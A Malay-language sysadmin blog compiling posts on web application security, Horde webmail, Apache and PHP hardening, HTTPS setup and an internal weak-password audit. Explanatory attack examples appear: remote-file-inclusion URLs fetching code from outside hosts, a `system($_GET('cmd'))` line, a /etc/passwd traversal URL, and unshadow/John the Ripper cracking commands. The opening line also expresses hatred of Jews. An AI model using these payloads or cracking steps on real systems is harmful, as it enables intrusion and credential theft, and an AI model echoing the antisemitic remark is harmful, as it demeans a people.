*Sampai botak memikir hehehe...aku kagum dengan bakat steve jobs and belajar apa yang baik padanya, but i am totally hate yahudi

Aku nak kongsi tips-tips yang aku perolehi berdasarkan pengalaman sendiri dan juga pengalaman orang lain.

Perkara perlu pembangun sistem aplikasi web ambil tahu.

1) Pastikan web server (Apache) telah melaksanakan konfigurasi yang selamat

2) Pastikan Application server (PHP) telah melaksanakan konfigurasi yang selamat juga

3) Pastikan Database Server (mysql / postgresql) turut telah melaksanakan konfigurasi yang selamat juga

4) Pastikan semasa pembangunan sistem atau naiktaraf sistem, jangan sekali-sekali lakukan pada host server yang sedang live kerana ini mengundang kepada masalah berikut :
- serangan hackers yang mudah sebab aplikasi dibangunkan tidak sepenuhnya bersedia untuk live
- pengguna sistem akan merasa terganggu dan sakit hati sebab asyik berubah sahaja sistem yang sedang digunakan mereka pada masa tu.

5) Semasa membangunkan sistem, laksanakan di server ujian sebelum di transfer kepada server live. Pastikan server ujian mempunyai konfigurasi kawalan keselamatan web server dan application server yang sama seperti server sebenar bagi mengelakkan fungsi sistem dibangunkan tidak dapat dilaksanakan di server live nanti

6) Kenalpasti keperluan perisian sokongan sebelum membangunkan sistem aplikasi bagi memastikan proses migrasi kepada server sebenar lebih mudah.
- kenalpasti konfigurasi, jenis dan versi web server
- kenalpasti konfigurasi, jenis dan versi application server
- kenalpasti konfigurasi, jenis dan versi database server
- kenalpasti module dan perisian sokongan dari segi jenis dan versi bagi memastikan sistem berfungsi dengan baik (cth : mod_ssl, phpmyadmin)

7) Jangan sesekali suka menggunakan nama fail yang mudah dikenali seperti :

- admin_edit.php
- admin_delete.php

Ini kerana nama tersebut mudah dikenali di seluruh dunia. Cuba berikan nama bersesuaian dan lebih bersifat lokaliti cth :

- ptadbir_kemaskini.php
- ptadbir_padam.php

Nama mengikut lokaliti mengurangkan risiko nama fail dan fungsinya dikenali hackers kerana kebanyakan mereka memang tau berbahasa inggeris sebab belajar ICT ni semua rujukan kebanyakannya dalam bahasa inggeris. Namun kena ingat, orang malaysia pun dah pandai hack...so fikirkanlah nama bersesuaian yang susah orang lain untuk kenalpasti fungsi fail tersebut TAPI...jangan pula sampai pembangun sistem sendiri tak tahu...

8) Jangan sesekali suka meninggalkan fail backup di dalam folder yang akan diletakkan di dalam host server live. Begitu juga dengan fail untuk kegunaan restore database barangkali ada dalam server live. Contohnya :

- admin_edit2.php
- admin_delete3.php
- sistemabc.sql

Langkah ini mengundang risiko paling bahaya kepada sistem anda kerana kemungkinan fail tersebut tidak ditetapkan kawalan keselamatan yang ketat kerana ianya tidak bersedia untuk paparan live server dan ini mengundang hackerz untuk menjadikannya sebagai batu loncatan bagi membolehkan menceroboh server tersebut seterusnya melakukan kerja tak sepatutnya pada sistem tersebut.

9) Apabila membangunkan sistem yang mempunyai tahap capaian yang ketat, maka pemerhatian terperinci perlu dibuat kepada kaedah kawalan capaian kepada data di dalam setiap page yang dibina. Contoh algorithm :

if session(validuser) = true
paparkan data dikehendaki
else
redirect ke page login bagi memaksa pengguna login dahulu
endif

10) Penggunaan session atau cookies perlulah berhati-hati dan pastikan datanya di encypt agar tidak dapat diserang menerusi man in the middle attack. Validation setiap page perlu dibuat bagi memastikan ianya mematuhi ketetapan sistem berdasarkan tahap capaian.

11) Jangan sesekali suka dan terlalu banyak menggunakan include dalam satu-satu page. Ini mengundang risiko berikut jika tidak dikawal sebaiknya :
- serangan hackerz menerusi include injection kepada page include yang tidak dikawal tahap capaian
- memperlahankan akses dan proses kepada page tersebut. mengundang kebosanan pengguna gunakan sistem

12) Minimakan penggunaan javascript dan sebolehnya diringkaskan codingnya. Begitu juga coding server side di setiap page perlu diringkaskan sebaik mungkin agar proses page dapat dikurangkan dan lebih cepat. percayalah!...ia memang amat membantu

13) Kawal juga jenis fail dan saiz fail yang ingin di upload ke dalam server. Ini kerana tanpa ada kawalan yang baik akan mengundang serangan hackerz yang amat mudah dan juga turut menyebabkan server menjadi slow kemungkinan serangan DDOS kepada upload page tu. Selain tu tiada penetapan saiz fail bakal menyebabkan pengguna akan mengalami respon sistem yang teramat perlahan, Cuba gunakan kaedah pecah kecil fail sebelum di hantar kepada server.

14) Bagi kemasukan data yang banyak sampai 2-3 page borang manual dan dilaksanakan dalam sistem yang besar penggunanya akan menyebabkan sistem terasa amat perlahan kesudahannya, percayalah. Sebaiknya pecah kecil mengikut subtopik pada borang tersebut dan kemaskini secara runcit ke dalam server. Ini bagi mengurangkan proses penghantaran data yang terlalu besar sekaligus kepada server secara serentak kepada semua pengguna pada satu-satu masa. Pecah kecil akan membantu mengurangkan packet data yang diproses seterusnya melajukan akses kepada sistem

15) Bagi pelaksanaan web sistem, janganlah melaksanakannya mengikut flow sistem client server seperti ada satu sistem tu...Bina interface yang user friendly dan mudah dicapai dalam 1 muka surat tanpa perlu scroll panjang ke bawah serta mudah nak mencapai fungsi-fungsi tertentu dalam sistem. Kaedah HCI (Human Computer Interface) ni memang dah jadi topik utama dalam ijazah atau diploma ICT sekarang ni...

16) Pastikan form page perlulah dibuat validation bagi menjadikannya zero error input daripada pengguna. Make it as perfect as possible supaya nanti pembangun sistem tk perlu pening kepala nak kena ubah database ikut jalan belakang.

* Aku rasa setakat ni dulu apa yang aku teringat untuk dikongsi bersama. Jika rakan-rakan ada cadangan tambahan lain pada artikel ni amatlah dialukan.

~ Be a Creator Not a User ~

Horde Day

2011-01-03T17:40:00.002+08:00

Kali ni aku nak cerita pasal Webmel Horde. Di ofis guna webmel ni sejak 2008. Walaupun skang ni ada zimbra dan kira the most popular, tapi kami still guna Horde sebab dah biasa dan still one of the best Webmel Ever...

Masalah paparan emel dalam horde by default takkan keluar terus emel yang dihantar dalam format HTML. Kalau format plain text ia akan terus paparkan. Ini disebabkan oleh banyak vulnerable dari emel berunsur HTML ni. Boleh trigger XSS attack menerusinya.

Kaedah untuk enable paparan HTML dalam emel Horde :

1) Buka fail ... imp/config/mime_drivers.php
2) Tukar dari berikut :
$mime_drivers['imp']['html'] = array(
'inline' => false
kepada
$mime_drivers['imp']['html'] = array(
'inline' => true

3) Save dan lihat semula emel anda yang dihantar menggunakan HTML. Ianya akan terus dipaparkan.

Menapis mesej HTML dipaparkan dalam emel :

1) Menggunakan fungsi tidy PHP extension. Fungsinya adalah untuk menapis paparan output bagi HTML sebelum dipaparkan kepada pengguna dan ianya juga digunakan untuk membersihkan dan memperbaiki mesej yang dihantar menggunakan HTML mesej menggunakan mode HTML compose.
2) Pastikan PECL diinstall dalam server untuk menggunakannya

3) Buka fail .../imp/config/mime_drivers.php
4) Ubah dari :
'tidy' => false,
kepada
'tidy' => true,

Semak version dan configuration Horde

http://my.domain.com/horde/test.php

Kaedah konfigurasi selamat untuk Horde :

1) Temporary Files :
Horde banyak menggunakan temporary files bagi memastikan akses kepada Horde pantas. Namun kita kena pastikan semua fail tersebut adalah selamat.

Jangan sesekali menetapkan folder temporary files tersebut writable kepada pengguna web server dan tak writable kepada lain-lain pengguna. Ini kerana ianya akan mendedahkan maklumat-maklumat sensitif dalam server. Seeloknya tetapkan sebagai unreadable kepada pengguna lain. Atau dengan kata lain, tetapkan sebagai readable dan writable hanya kepada pengguna web server sahaja.

2) PHP Session
Untuk memastikan tahap keselamatan Horde, PHP Session cookies perlulah di enable dalam PHP setting session.use_cookies. Juga pastikan cookie path dan cookie domain ditetapkan dalam konfigurasi Horde. Pastikan session cookie ditetapkan dalam konfigurasi Horde dan ianya dah jadi default pun sekarang ni.

Jika guna HTTPS, maka ini akan memaksa cookies di hantar menerusi secure connection yang dapat halang sebarang sidejacking.

Horde yang besar perlu tetapkan maklumat session.entropy_file dan session.entropy_length yang bersesuaian.

Horde akan enkrip maklumat pengguna sebelum disimpan dalam session. Namun ianya akan dikuatkan lagi sekiranya menggunakan PHP extension 'mcrypt' yang membenarkan enkripsi yang lebih kuat.

3) Default Database Password
Pada asasnya apabila install Horde, ia akan guna default user dan password untuk akses kepada horde database. Menggunakannya untuk production mengundang serangan penceroboh kerana penyerang boleh teka password default dengan mudah.

Pastikan password ditukarkan kepada yang lebih selamat

4) Prevent Configuration File Reading and Writing

Fail konfigurasi mengandungi maklumat yang sensitif seperti kata laluan database dan perlu dilindungi daripada read atau write oleh local system user atau remote web user.

Bagi pengguna Unix/Linux, gunakan penetapan permission bagi folder berkenaan berdasarkan user web server. Berikut adalah contoh konfigurasi penetapan permission menggunakan user apache :

$ chown -R apache /home/httpd/html/horde/config
$ chown -R apache /home/httpd/html/horde/*/config
$ chmod -R go-rwx /home/httpd/html/horde/config
$ chmod -R go-rwx /home/httpd/html/horde/*/config

Untuk penetapan permission yang lebih kukuh, tetapkan terus capaian tree Horde HANYA kepada web server user dan root sahaja :

$ chown -R apache /home/httpd/html/horde
$ chmod -R go-rwx /home/httpd/html/horde
$ chmod -R a-w /home/httpd/html/horde/

Nota : baris akhir menetapkan semua fail unwritable dari semua pengguna kecuali root sahaja boleh ubah. Ianya akan membuatkan site selamat tetapi agak rumit untuk selenggara. Ianya akan menyebabkan kita tak boleh ubah melalui Horde Web Administrative dan hanya boleh dibuah secara manual terus kepada fail menggunakan akses root.

Konfigurasi atas ini masih lagi belum selamat jika pengguna lain di server yang sama menjalankan script arahan menggunakan apache user. Bagi menghindarkannya, kita perlu tetapkan akaun yang berbeza mengikut setiap pengguna dan run menggunakan module apache suexec. Anda perlu sentiasa memantau modul cgi, mod_php, mod_perl, mod_python dan lain-lain lagi.

5. Restricting test.php files

Fail test.php memaparkan banyak maklumat yang penting dan rahsia tentang sistem horde anda dan amat beruntung apabila hackers menjumpainya. Ianya digunakan oleh developer untuk kenalpasti sama ada modul dan fungsi dalam horde telah berfungsi dengan baik atau tidak. Setelah ianya berfungsi dengan baik, maka disable akses kepada fail tersebut. Untuk melaksanakannya sila laksanakan command berikut :

$ chmod a-rwx /home/httpd/html/horde/test.php
$ chmod a-rwx /home/httpd/html/horde/*/test.php

6. Preventing Apache from serving configuration and source files

Fail konfigurasi Horde mengandungi pelbagai data sulit ( kata laluan database). Direktori lain juga mengandungi PHP Source code yang tidak sepatutnya dipaparkan kepada pengguna biasa. Horde group telah menyediakan fail .htaccess dalam pelbagai direktori untuk membantu menghalang akses kepada fail tersebut. Walaubagaimanapun, ianya bergantung kepada pemilik server sendiri bagi yang hosting di luar kerana ianya terdapat isu dari segi prestasi server dan juga sesetengahnya tidak membenarkan penggunaannya kerana banyak isu keselamatan.

Site Apache juga boleh menghalang web server dari membenarkan akses kepada fail-fail tersebut dengan memasukkan section berikut ke dalam httpd.conf mengikut contoh berikut :

Ulangi kaedah tersebut pada setiap Horde application. Sebagai contoh untuk IMP seperti berikut :

7. Setup scripts

Terdapat pelbagai skrip yang digunakan untuk setup dan configure Horde. Sekiranya web server dibenarkan akses oleh pelbagai pengguna lain, anda perlu pastikan kawalan dibuat pada fail tersebut. Dalam Unix, kita boleh tetapkan akses kepada fail tersebut hanya kepada pengguna root sahaja dengan comman berikut :

$ chown -R root /home/httpd/html/horde/scripts
$ chown -R root /home/httpd/html/horde/*/scripts
$ chmod -R go-rwx /home/httpd/html/horde/scripts
$ chmod -R go-rwx /home/httpd/html/horde/*/scripts

8. Using a chroot web server setup

Pengguna Unix boleh menggunakan chroot jail untuk mengekang sebarang perubahan kepada fail selain dari folder berkenaan. Bagi tujuan konfigurasinya boleh rujuk :

http://www.cyberciti.biz/tips/chroot-apache-under-rhel-fedora-centos-linux.html

9. Hiding PHP info from the user

Anda perlu pastikan konfigurasi mengikut PHP variable berikut di dalam php.ini bagi menghalang kebocoran maklumat kepada pengguna biasa :

expose_php = Off
display_errors = Off
log_errors = On
register_globals = Off

Anda perlu tetapkan error loggin (menggunakan PHP error_log variable) untuk log kepada fail, syslog, atau destinasi log lain.

10. Using a secure web server

Horde amat bergantung kepada transaksi maklumat sensitif ( kata laluan dan maklumat session) antara web server dan web client. Penggunaan SSL web server amat membantu untuk melindungi maklumat tersebut apabila melalui rangkaian.

11 Using a secure POP3/IMAP server

Sekiranya anda menggunakan POP3/IMAP server dengan Horde, maka Horde akan menghantar maklumat login diantara web server dan mail server.

Sekiranya web server dan IMAP Server dalam satu host yang sama, anda boleh tingkatkan kawalan keselamatan dengan menetapkan semua aliran trafik perlulah hanya melalui loopback atau localhost interface sahaja agar ianya tidak akan terdedah ke dalam rangkaian.

Dalam sesetengah kes, yang mana ianya tidak boleh dilakukan maka gunakan secure mail connection seperti IMAP-SSL atau POP3-SSL untuk memastikan kata laluan seIn cases where that is not possible, we recommend using a secure mail connection such as IMAP-SSL or POP3-SSL to ensure that passwords remain safe.

12. LDAP Security

Kawalan keselamatan LDAP sama seperti dibuat pada POP3/IMAP. Anda perlu pastikan password ldap atau maklumat penting berkenaan LDAP Database tidak didedahkan.

13 Database socket security

Sekiranya database anda (cth: MySQL atau PostgreSQL) adalah pasa server yang sama dengan web server anda, seeloknya gunakan unix sockets berbanding tcp connections untuk membantu meningkatkan kawalan keselamatan server (dan juga pertingkat prestasi Horde). Sekiranya ia tidak support unix sockets, anda boleh capai kawalan keselamatan lebih baik dengan menetapkan tcp untuk support loopback atau capaian menggunakan localhost sahaja.

Sekiranya database menetapkan socket fail (cth : mysql.sock) di dalam direktori seperti /tmp atau /var/tmp, anda perlu tetapkan permission dengan baik agar local user (jika ada) tidak boleh delete fail tersebut. Anda perlu pastikan fail socket tersebut tidak boleh writable oleh pengguna lain atau pengguna lain boleh delete fail tersebut.

Anda boleh juga pindahkan socket fail tersebut kepada direktori lain seperti /var/run atau top level direktori pada sistem database anda (cth : /var/lib/mysql atau /var/lib/pgsql).

14 Sendmail or SMTP considerations

Dalam sesetengah keadaan, anda boleh tambahkan kawalan keselamatan dengan menghantar emel menggunakan program local command line sendmail pada web server anda berbanding menggunakan SMTP. Bagaimanapun kadang2 ada sebabnya perlu menggunakan SMTP supaya dapat menapis spam atau virus sebelum dihantar kepada penerima emel. Ini kerana local sendmail akan skip semua tu.

Nota ni aku rujuk dari sini dan diterjemahkan dengan bahasa mudah untuk orang kita :
http://www.horde.org/horde/docs/?f=SECURITY.htm

~ Be a Creator Not a User ~

How to speed up Public Access to Your Joomla Portal

2010-12-21T14:41:00.004+08:00

Tips ni hanya untuk pengguna Linux sahaja.
OS : CentOS 5.x / RHEL 5.3
Web Server : Apache 2.x
Database Server : MySQL 5.x
Web Application : Joomla
Number of VHOST : 18

Aku cari dan try2 juga bermacam kaedah untuk tune web server sebab bukan semuanya disebabkan oleh RAM dan CPU perlu naiktaraf sahaja. Ada banyak punca lain yang boleh dibuat untuk melaksanakannya.

Kebanyakan kita memang selalu gunakan saja apa yang default konfigurasi pada servis yang digunakan di server. Tanggapan itu ok bagi small web application, tapi kalau untuk pelaksanaan web application yang besar atau mempunyai banyak host, anda perlu tune server tu untuk menepati kapasiti yang diperlukan.

Langkahnya :

Load balancing on services tuning :
1) Pecahkan database server dan application server ke dalam server yang berbeza
- untuk mengurangkan load server apabila pelbagai host melaksanakan proses menggunakan apache dan mysql bagi melayan permintaan pengguna luar pada masa yang sama dan dalam satu server sahaja. Jadi elok dipecahkan kedua-duanya ni.
Security Tuning :
2) Langkah2 tuning keselamatan perlulah dilaksanakan di kedua-dua server tersebut mengikut kaedah yang ada aku terangkan dalam artikel terdahulu.

OS Tuning :
3) Tetapkan share memory OS agar mampu untuk tampung pengguna yang ramai kepada server pada satu-satu masa. Buka file /etc/sysctl.conf

-------------------------------------------------------------------------------------------------
#Jika share memory ditetapkan adalah 512MB
kernel.shmall = 536870912
kernel.shmmax = 536870912
fs.file-max = 16384
-------------------------------------------------------------------------------------------------

MySQL tuning :
4) Laksana tuning pada server mysql. Buka fail /etc/my.cnf
Konfigurasi untuk huge server (mempunyai banyak database dan bersaiz besar). Sesuai untuk jumlah pengguna yang akses ke server tersebut > 200 pada satu-satu masa.
-------------------------------------------------------------------------------------------------
[mysqld]
key_buffer = 64M
sort_buffer = 1M
join_buffer = 1M
max_allowed_packet = 8M
max_heap_table_size = 16M
table_cache = 1024
sort_buffer_size = 8M
read_buffer_size = 1M
read_rnd_buffer_size = 768K
myisam_sort_buffer_size = 48M
thread_cache_size = 512
query_cache_type = 1
query_cache_limit = 4M
query_cache_size = 64M
tmp_table_size = 16M
# Try number of CPU's*2 for thread_concurrency
thread_concurrency = 4

max_write_lock_count = 1
#To force MySQL to temporarily elevate the priority of all SELECT statements that are waiting for a table after a specific number of inserts to the table occur. This allows READ locks after a certain number of WRITE locks.

low_priority_updates = 1

[isamchk]
key_buffer = 64M
sort_buffer = 64M
read_buffer = 16M
write_buffer = 16M

[myisamchk]
key_buffer = 64M
sort_buffer = 64M
read_buffer = 16M
write_buffer = 16M
------------------------------------------------------------------------------------------------

Apache tuning :
5) Ada tips suh guna php fastcgi...ianya sebenarnya sama macam apache module juga. Cuma banyak sangat perubahan kena buat jadi aku tak berani dan tanak amik risiko. Lagipun ada yang dah guna dan uji sebenarnya antara guna apache module dan php fastcgi tu perbezaannya tak ketara. Hanya sikit peningkatan apabila gunakan PHP fastcgi. So aku amik keputusan gunakan memcached untuk improve performance server tu. Memcached sesuai untuk web server dinamik, yang mana data dipaparkan disimpan dalam database.

Dalam Apache ada 2 jenis module prefork dan module worker. By default module prefork di tetapkan pada server apache. Module prefork digunakan untuk server unix yang mempunyai single atau duo processor. Manakala jika server menggunakan multi processor, maka elok guna module worker yang dikhususkan untuk handle multi thread.

Install memcached dahulu :
# yum install memcached

Ubah fail /etc/sysconfig/memcached seperti berikut :

PORT="11211"
USER="nobody"
MAXCONN="1024"
CACHESIZE="256"
OPTIONS=""

Install PHP memcache.so :
# yum install php-memcache

Enablekan/tambahkan di dalam fail /etc/php.ini :

extension=memcache.so

Restart httpd

Overall tuning :
6) Restart server tu lepas semua di atas siap dilaksanakan.
# shutdown -r now

InsyaAllah berjaya, sebelum ni untuk akses ke server joomla amik masa dalam dekat 1 minit lebih untuk keluarkan paparan main page. Tapi lepas laksanakan kaedah ni ia menurun kepada <15 saat sahaja untuk paparkannya.

~ Be a Creator Not a User ~

10 step to setup HTTPS Server

2010-12-06T18:00:00.000+08:00

Berikut adalah langkah-langkah yang perlu dilakukan untuk menjadikan web server kita akses secara https sahaja.

1) Install mod_ssl dan openssl
# yum install mod_ssl openssl

2) # Cipta private key
# openssl genrsa -out ca.key 1024

3) # Cipta CSR
# openssl req -new -key ca.key -out ca.csr

4) Cipta Self Signed Key
# openssl x509 -req -days 365 -in ca.csr -signkey ca.key -out ca.crt

5) Salin semua fail ke lokasi yang betul berikut :
# cp ca.crt /etc/pki/tls/certs

6) Salin semua fail ke lokasi yang betul berikut :
# cp ca.key /etc/pki/tls/private/ca.key

7) Salin semua fail ke lokasi yang betul berikut :
# cp ca.csr /etc/pki/tls/private/ca.csr

8) Edit fail ssl.conf :
# nano +/SSLCertificateFile /etc/httpd/conf.d/ssl.conf
Cari line berikut dan ubah kepada berikut :

SSLCertificateFile /etc/pki/tls/certs/ca.crt
SSLCertificateKeyFile /etc/pki/tls/private/ca.key

9) Edit fail httpd.conf :
Cari line berikut dan ubah kepada berikut :
#Listen 80

10 ) Restart httpd :
# /etc/init.d/httpd restart

Kan senang dah siap...cuma certificate yang dicipta tu bukanlah cert yang universal valid. Nak guan yang valid kena daftar di DigiCERT.

Selamat Mencuba!

~ Be a Creator Not a User ~

Check For Weak Unix User's Password

2010-11-30T18:22:00.003+08:00

Ni aku copy dari garis panduan keselamatan ICT yang aku buat untuk agensi tempat aku kerja untuk dikongsi bersama.

GARIS PANDUAN KENALPASTI KATA LALUAN LEMAH BAGI PENGGUNA UNIX / LINUX

Lokasi Fail Linux Server

/usr/bin/unshadow – Perisian untuk unshadow fail menyimpan maklumat pengguna dan kata laluan unix
/etc/passwd – Menyimpan maklumat pengguna dan kata laluan unix
/etc/shadow - Menyimpan maklumat pengguna dan kata laluan unix

Langkah Mengenalpasti Kata Laluan Lemah

Penerangan ini hanya bagi server yang tidak menggunakan root sebagai login utama untuk SSH. Jika login root digunakan, ubah dari user kepada root dalam tatacara ini.

Server yang ingin laksana brute force crack perlulah dibuat instalasi perisian John the Ripper Password Cracking Tool
# yum install john
Login ke server (10.10.10.xx) menggunakan pengguna server (cth : user1) melalui SSH. Kemudian login sebagai pengguna root dengan menaip # su seterusnya diikuti kata laluan pengguna root.
Buat salinan fail pengguna dan kata laluan unix menggunakan perisian unshadow
# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
Pindah fail ke server lain untuk dibuat semakan kelemahan kata laluan (Kaedah Brute Force Crack ini menggunakan resource CPU yang tinggi, server khas untuk aktiviti semakan diperlukan)
# scp user1@10.10.10.xx:/tmp/crack.password.db user2@10.10.10.yy:/home/user2
Login ke server (10.10.10.yy) untuk semakan menggunakan pengguna server (cth : user2) melalui SSH. Kemudian login sebagai pengguna root dengan menaip
# su
seterusnya diikuti kata laluan pengguna root.

Laksana brute force crack pada fail password yang telah disalin. Proses ini akan mengambil masa agak lama sedikit untuk selesai.

# john /home/user2/crack.password.db

Output :
john  /home/user2/crack.password.db
Loaded 1 password (FreeBSD MD5 [32/32])

Sekiranya kita interrupt semasa proses ini dilaksanakan dan ingin sambung semula :
$ john -restore /home/user2/crack.password.db

Setelah siap laksana brute force crack, paparkan senarai pengguna yang mempunyai kata laluan yang lemah.

$ john -show /home/user2/crack.password.db 

Output :
test:123456:1002:1002:test,,,:/home/test:/bin/bash
didi:abc123:1003:1003::/home/didi:/usr/bin/rssh

2 passwords cracked, 1 left
(Setiap oktet dipisahkan oleh ':'. Oktet pertama adalah nama pengguna, oktet kedua adalah kata laluan yang lemah)

Jika Fail output terlalu besar dan banyak, pindahkan keputusan kepada fail lain.
$ john -show /home/user2/crack.password.db > cp.txt

Terdapat beberapa arahan lain yang boleh dilaksanakan dalam perisian ini. Sila rujuk URL

berikut : http://www.openwall.com/john/doc/EXAMPLES.shtml

Semoga Berjaya..

~ Be a Creator Not a User ~

Tips to Upgrade to MySQL Community Server 5.5.7 RC

2010-11-18T11:57:00.001+08:00

Bebaru ni aku upgrade mysql di server kepada versi community terbaru.
Namun berlaku beberapa masalah dari segi capaian kepada mysql setelah di upgrade menggunakan yum dan repo remi-test.

servis mysql tetiba stop.

Langkah baik untuk upgrade adalah seperti berikut :

1) Buat backup bagi semua data dalam mysql sebelum di upgrade (AMAT digalakkan)
2) Jadi aku pun upgrade kepada versi terkini guna yum :
# yum --enablerepo remi-test update mysql-server

Tetiba kuar error ni bila aku tengok dalam log mysql (/var/log/mysqld.log) :
[ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.proxies_priv' doesn't exist)

3) Rupenye untuk versi baru ni kena buat mysql_upgrade secara manual dan ianya adalah wajib dilaksanakan.

Mula-mula run command ni :
# start in rescue mode (with --skip-grant-tables and --skip-networking options)
service mysqld startsos

Lepas tu command ni :
mysql_upgrade -u root -p
kemudian masukkan password root

Then command ni :
# re-launch in normal mode
service mysqld restart

4) Alhamdulillah service mysql kembali normal

Semoga berjaya.

~ Be a Creator Not a User ~

PHP Hardening

2010-10-21T10:52:00.002+08:00

Lagi kongsi Nota dari Konti Kelas INTANBK.

OS : CentOS / RHEL
Web Apps : PHP 5.2.x / 5.3.x

1) Halang dari PHP Remote File Inclusion
- Ia mampu guna kelemahan php include / require untuk panggil fail backdor dari website luar
- contoh :

include($base_path . "/foo.php");

- Kaedah query :

http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=

- contoh : (use register global)

include($_REQUEST['own_me'] . '/foo.php');

- Kaedah Query :

http://lwn.net/Articles//master.php?root_path=http://webstorch.com//cap.txt?

- Antivirus tak dapat detect virus backdoor dalam linux
- Kaedah nak semak sebarang fail backdoor :
> sort tarikh fail
> cari fail pelik
> cari fail bersaiz pelik

Solution :
Ubah dalam fail /etc/php.ini
allow_url_fopen = Off

2) Safe Mode
- Execute program luar dan display hasilnya dalam sistem
- contoh :
system($_GET('cmd')

Solution :
Ubah dalam /etc/php.ini
Safe_mode = on

* Dalam Joomla akan problem apabila onkan kerana ia gunakan 'mysql_connect' untuk connect ke database. Alternatif gunakan 'mysqli'

3) File Upload
- Ubah kepada berikut :
file_uploads = Off
fck_editor dalam joomla ada vulnerable, alternatif adalah guna ck_editor
- Jika ada guna upload fail, jangan disablekan fungsi ini

4) Short Open Tag
- Contoh :

- Baru :

- ubah kepada berikut :
short_open_tag = Off

5) Error Reporting
- Bagi elakkan paparan error ditunjukkan di sistem. Ia memudahkan hackerz untuk kenalpasti kelemahan pada server dan dapatkan maklumat asas.
- ubah kepada berikut :
display_errors = Off

6) magic_quotes_gpc
- Fungsi ianya on adalah bila ada (') ia akan ganti dengan ('\')
- Sistem yang guna magic quotes sekiranya guna di server yang disetkan off, maka akan jadi vulnerable pula kepada sistem
- PHP 6 dah tiada penggunakan magic quotes
- Ubah kepada berikut :
magic_quotes_gpc = Off

7) Connect to Database
- Default menggunakan mysql_connect
- Kini guna 'mysqli' dan ianya lebih selamat

8) Hide PHP Version (Baru dapat tau ni)
- Default : expose_php = On
- Tukar kepada : expose_php = Off

- Dari Result begini apabila check version : X-Powered-By: PHP/5.1.2-1
- Kepada result begini : X-Powered-By: 12321

Semoga Berjaya!

~ Be a Creator Not a User ~

Apache / HTTPD Hardening

2010-10-19T11:05:00.005+08:00

Lagi nota dari INTANBK untuk dikongsi bersama.

OS : CentOS / RHEL

1) Buka file httpd.conf
# nano /etc/httpd/conf/httpd.conf

2) Halang Directory Listing
Ubah kepada berikut :
Options -Indexes FollowSymLinks

3) Halang Directory Traversal
Ubah kepada berikut :
Options -Indexes -FollowSymLinks

Kaedah Directory Traversal :
- Gunakan kelemahan pada coding include untuk baca fail lain
- cth : httpd://localhost/itsec/dir.php?file=../../../../etc/passwd
- Ia akan dapat view semua user dalam server.
- root:x:0:0:root:/root:/bin/bash
- column pertama bermaksud nama user, column kedua 'x' bermaksud ada password ditetapkan, column terakhir bermaksud fungsi user boleh menggunakan bash command line
- Sekiranya hackerz tahu sebarang user yang tiada set password dan fungsi user tersebut boleh laksana command line maka ini memberi risiko besar kepada server tersebut.

3) Halang Server Token
- kenalpasti versi web server dan OS apa digunakan oleh server tersebut
- Ia membantu hackerz kenalpasti kelemahan pada versi tersebut
- Bagi xampp by default ia akan setkan sebagai full

ServerTokens Prod[uctOnly]

ServerTokens Major
Result : Server: Apache/2

ServerTokens Minor
Result : Server: Apache/2.0

ServerTokens Min[imal]
Result : Server: Apache/2.0.41

ServerTokens OS
Result : Server: Apache/2.0.41 (Unix)

ServerTokens Full (or not specified)
Result : Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2

Ubah kepada berikut :
ServerToken prod

Kaedah ujian :
Taip berikut di command line : # Telnet 80
Tekan ENTER
Taip OPTIONS * HTTP/1.0
Tekan ENTER

Result :
HTTP/1.1 200 OK
Date: Tue, 19 Oct 2010 02:50:43 GMT
Server: Apache/2.2.16 (EL)
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

4) Tetapkan web server agar bind kepada spesifik ip.
Ubah kepada berikut :
Listen x.x.x.x:80

Jika web server berfungsi untuk semua, maka tetapkan kepada :
Listen 80

5) Disable mana-mana LoadModule yang tidak digunakan
- mod_proxy //disablekan
- Untuk rujukan dan semakan boleh tengok site berikut :
http://httpd.apache.org/docs/2.0/mod/

6) User dan Group bagi folder di www perlulah di setkan dengan user yang mempunyai limited access dan tidak sama group dengan root

7) Serveradmin // emel admin
- ada pro dan kontra untuk enable dan disable fungsi ini.
- pro memudahkan pengguna sistem membuat aduan berkaitan server
- kontra adalah emel boleh digunakan untuk hantar spam mail

8) Servername
- Letak lagi bagus agar tahu identity server

9) mod_rewrite
- Perlu di enable untuk disable TRACE dan TRACK
- Tambah berikut di bahagian bawah file httpd.conf :
----------------------------------------------
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
----------------------------------------------

10) Error Log dan Custom Log perlulah dienablekan untuk memudahkan membuat kerja auditing pada masa akan datang

11) ServerSignature
- Default - On
- Tukar kepada - Off

12) Disable WebDAV
- Default httpd.conf telah disable
- WebDAV digunakan oleh FrontPage untuk upload file server
- Semak guna telnet dan kesan result berikut :
Result : PUT, COPY, DEL, MKDIR

13) Deny Access To Certain File Types
Ini adalah contoh Block access kepada fail .htaccess shj

Ini pula adalah contoh block acces kepada beberapa fail yang mempunyai extension .inc

Semoga berjaya

Rujukan lain : http://httpd.apache.org/docs/2.0/misc/security_tips.html

~ Be a Creator Not a User ~

How to minimize Web Server Installation

2010-10-12T18:49:00.001+08:00

Lagi nota di INTAN BK. Kita biasa kalau setup OS CentOS atau RHEL akan guna template as web server yang sedia ada di dalam tu. Dah jalan ok biar je la.
Kelemahannya :
1) terdapat servis yang tidak digunakan pada web server kita tapi still install dan ini menyebabkan mudah terdedah kepada hackerz akibat vulnerable kerana tidak patch
2) Biasa kita akan abaikan servis yang telah diinstall tapi tak digunakan selagi web server jalan ok. Tapi ia menyumbang kepada slow proses kepada web server tersebut.

OS : CentOS / RHEL

Kaedahnya :
1) Laksana yum remove // bertujuan untuk kenalpasti software apa yang bergantung pada software httpd
# yum remove httpd
Maka akan keluar result seperti berikut :
---------------------------
Removing:
httpd               i386        2.2.16-jason.1          installed        7.8 M
Removing for dependencies:
httpd-manual        i386        2.2.16-jason.1          installed        3.5 M
mod_perl            i386        2.0.4-7.jason.2         installed        9.5 M
mod_python          i386        3.3.1-8.jason.2         installed        3.0 M
mod_security        i386        2.5.12-1.el5            installed        3.3 M
mod_ssl             i386        1:2.2.16-jason.1        installed        723 k
php                 i386        5.2.14-jason.1          installed        9.4 M
webalizer           i386        2.01_10-30.1            installed        251 k

Transaction Summary
==================================================================
Install      0 Package(s)
Update       0 Package(s)
Remove       8 Package(s)

